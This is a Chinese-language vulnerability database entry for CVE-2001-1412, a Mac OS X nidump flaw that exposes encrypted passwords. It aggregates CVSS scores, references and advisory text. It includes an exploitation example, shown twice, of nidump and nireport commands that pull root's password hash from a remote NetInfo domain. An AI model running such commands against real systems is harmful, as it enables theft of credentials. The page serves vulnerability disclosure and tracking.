CVE-2001-1412
CVSS2.1
发布时间 :2003-11-17 00:00:00
修订时间 :2016-10-17 22:15:19
NMCOES    

[原文]nidump on MacOS X before 10.3 allows local users to read the encrypted passwords from the password file by specifying passwd as a command line argument.


[CNNVD]Apple Mac OS X nidump密码文件泄露漏洞(CNNVD-200311-062)

        MacOS X 10.3之前版本的nidump存在漏洞。本地用户通过指定passwd作为命令行参数从密码文件中读取加密的密码。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1412
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1412
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-062
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/mhonarc/security-announce/msg00038.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00038.html
http://lists.insecure.org/lists/bugtraq/2002/Sep/0128.html
(VENDOR_ADVISORY)  BUGTRAQ  20020915 nidump on OS X
http://marc.info/?l=bugtraq&m=99953038722104&w=2
(UNKNOWN)  BUGTRAQ  20010903 Re: Possible Issue with Netinfo and Mac OS X
http://securitytracker.com/id?1001946
(UNKNOWN)  SECTRACK  1001946
http://www.securemac.com/macosxnidump.php
(VENDOR_ADVISORY)  MISC  http://www.securemac.com/macosxnidump.php
http://www.securiteam.com/securityreviews/5QP032A4UU.html
(VENDOR_ADVISORY)  MISC  http://www.securiteam.com/securityreviews/5QP032A4UU.html

- 漏洞信息

Apple Mac OS X nidump密码文件泄露漏洞
低危 设计错误
2003-11-17 00:00:00 2005-10-20 00:00:00
远程※本地  
        MacOS X 10.3之前版本的nidump存在漏洞。本地用户通过指定passwd作为命令行参数从密码文件中读取加密的密码。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (20984)

Apple Mac OS X 10 nidump Password File Disclosure Vulnerability (EDBID:20984)
osX remote
2001-06-26 Verified
0 Steven Kreuzer
N/A [点击下载]
source: http://www.securityfocus.com/bid/2953/info

A vulnerability exists in all versions of Apple MacOS X.

It has been found to contain a vulnerability which could allow disclosure of passwords and other sensitive system information.

nidump is a Mac OS X system data extraction utility which can be used to read the contents of the NetInfo database. This utility's default file permissions leave this utility available to any local user at the command line.

However, hosts with a network nidomain may be vulnerable to remote exploitation of this issue. This is possible if remote tags are used for nidump. It should also be noted that both portmap and netinfobind must be listening on the target host for this issue to be exploited.

The output of the nidump command can reveal the list of usernames and passwords in clear text. An attacker could then use this list to log in as a user with administrative priveleges. 

% nidomain -l xxx.xxx.net
tag=network udp=797 tcp=798
tag=local udp=795 tcp=796

% nidump -t xxx.xxx.net/network passwd
root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh

% nireport -t xxx.xxx.net/network /users name uid
passwd
root 0 xxxxxxxxx.

% nidump -r / -t xxx.xxxx.net/network
{
"master" = ( "localhost/network" );
CHILDREN = (
{
"name" = ( "machines" );
CHILDREN = (
{
"name" = ( "localhost" );
"ip_address" = ( "xxx.xxx.xxx.xxx" );
"serves" = ( "./network", "localhost/local" );
}
)
},
{
"name" = ( "users" );
CHILDREN = (
{
"name" = ( "root" );
"passwd" = ( "xxxxxxxxx." );
"uid" = ( "0" );
"gid" = ( "0" );
"change" = ( "0" );
"expire" = ( "0" );
"realname" = ( "System Administrator" );
"home" = ( "/private/var/root" );
"shell" = ( "/bin/tcsh" );
}
etc. 		

- 漏洞信息

7040
Apple Mac OS X nidump Encrypted Password Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

Mac OS X contains a flaw that may lead to an unauthorized password exposure. It is possible to gain access to encrypted passwords using the nidump command, which may lead to a loss of confidentiality.

- 时间线

2001-06-26 Unknow
2003-10-30 Unknow

- 解决方案

Upgrade to version 10.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X nidump Password File Disclosure Vulnerability
Design Error 2953
Yes Yes
2001-06-26 12:00:00 2009-07-11 06:56:00
Reported to bugtraq by Steven Kreuzer <skreuzer@condenast.com> on June 29, 2001.

- 受影响的程序版本

Apple Mac OS X 10.1
Apple Mac OS X 10.0.4
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0

- 漏洞讨论

A vulnerability exists in all versions of Apple MacOS X.

It has been found to contain a vulnerability which could allow disclosure of passwords and other sensitive system information.

nidump is a Mac OS X system data extraction utility which can be used to read the contents of the NetInfo database. This utility's default file permissions leave this utility available to any local user at the command line.

However, hosts with a network nidomain may be vulnerable to remote exploitation of this issue. This is possible if remote tags are used for nidump. It should also be noted that both portmap and netinfobind must be listening on the target host for this issue to be exploited.

The output of the nidump command can reveal the list of usernames and passwords in clear text. An attacker could then use this list to log in as a user with administrative priveleges.

- 漏洞利用

The following remote exploitation example was provided by KF &lt;dotslash@snosoft.com&gt;:

% nidomain -l xxx.xxx.net
tag=network udp=797 tcp=798
tag=local udp=795 tcp=796

% nidump -t xxx.xxx.net/network passwd
root:xxxxxxxx.:0:0::0:0:System Administrator:/private/var/root:/bin/tcsh

% nireport -t xxx.xxx.net/network /users name uid
passwd
root 0 xxxxxxxxx.

% nidump -r / -t xxx.xxxx.net/network
{
"master" = ( "localhost/network" );
CHILDREN = (
{
"name" = ( "machines" );
CHILDREN = (
{
"name" = ( "localhost" );
"ip_address" = ( "xxx.xxx.xxx.xxx" );
"serves" = ( "./network", "localhost/local" );
}
)
},
{
"name" = ( "users" );
CHILDREN = (
{
"name" = ( "root" );
"passwd" = ( "xxxxxxxxx." );
"uid" = ( "0" );
"gid" = ( "0" );
"change" = ( "0" );
"expire" = ( "0" );
"realname" = ( "System Administrator" );
"home" = ( "/private/var/root" );
"shell" = ( "/bin/tcsh" );
}
etc.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站